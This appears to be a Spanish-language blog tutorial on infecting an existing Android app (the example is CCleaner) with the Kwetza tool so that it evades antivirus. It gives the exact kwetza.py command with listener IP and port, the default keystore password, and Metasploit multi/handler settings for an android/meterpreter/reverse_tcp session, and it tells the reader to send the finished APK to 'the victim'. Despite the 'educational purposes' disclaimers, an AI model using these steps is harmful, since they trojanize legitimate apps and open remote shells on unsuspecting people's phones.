Kwetza Infectar Aplicaciones Android
Kwetza infecta una aplicación para Android existente con cualquiera de las plantillas de encargo o de carga útil por defecto para evitar ser detectados por los antivirus. Kwetza le permite infectar aplicaciones Android usando permisos predeterminados de la aplicación de destino o se inyecta permisos adicionales para obtener una funcionalidad adicional.
Primero colonas o descargamos la herramienta. https://github.com/sensepost/kwetza.git una vez clonada la herramienta procederemos a instalarla.
Kwetza está escrito en Python y requiere BeautifulSoup que se puede instalar utilizando Pip:
pip install beautifulsoup4
Cabe mencionar que la herramienta necesita apktool para su funcionamiento, lo aremos de la siguiente forma. vamos a la pagina para descargarlo apktool una vez descargada la última versión procedemos a descargar el siguiente archivo link lo guardamos como .txt "apktool.txt" el archivo .jar descargado lo remombraremos y le pondremos apktool.jar
una vez hecho esto lo copiamos a la siguiente ruta: /usr/local/bin luego daremos permisos a ambos archivos.
una vez hecho todo esto procedemos a ejecutar la herramienta abrimos una terminal y desde donde la clonamos o descargamos tecleamos lo siguiente. el comando para lanzar la aplicación es la siguiente:
python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no
solo sustituiremos valores de la siguiente forma: python kwetza.py ccleaner.apk 192.168.1.10 4444 yes ccleaner es la aplicación que yo elegí mi ip y el puerto a la escucha el "si " es para darle permisos adicionales a la aplicación final.
una vez hecho esto esperamos que la aplicación haga su trabajo hasta que te llegue hasta la siguiente linea Passphrase for keystore: la contraseña por defecto es "password".
una vez terminado el proceso ya tendremos la aplicación lista para mandársela a la victima "recuerden esto es con fines educativos" la aplicación se guardara en la siguiente ruta:
/root/Herramientas/kwetza/ccleaner/dist/ccleaner.apk "allí fue donde yo la instale y la aplicación que use" esto variara dependiendo de donde la guardaron.
ya realizado todo esto procedemos a configurar Metasploit,
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.10 "nuestra ip"
set lport 4444 "el que usamos para configurar la apk"
una vez hecho esto pues ponemos a la escucha nuestro payload por tener la sesión exitosa. Como vemos tenemos una sesión de meterpreter exitosa.
ya con esto que vuele nuestra mente recuerden es con fines educativos.
No hay comentarios:
Publicar un comentario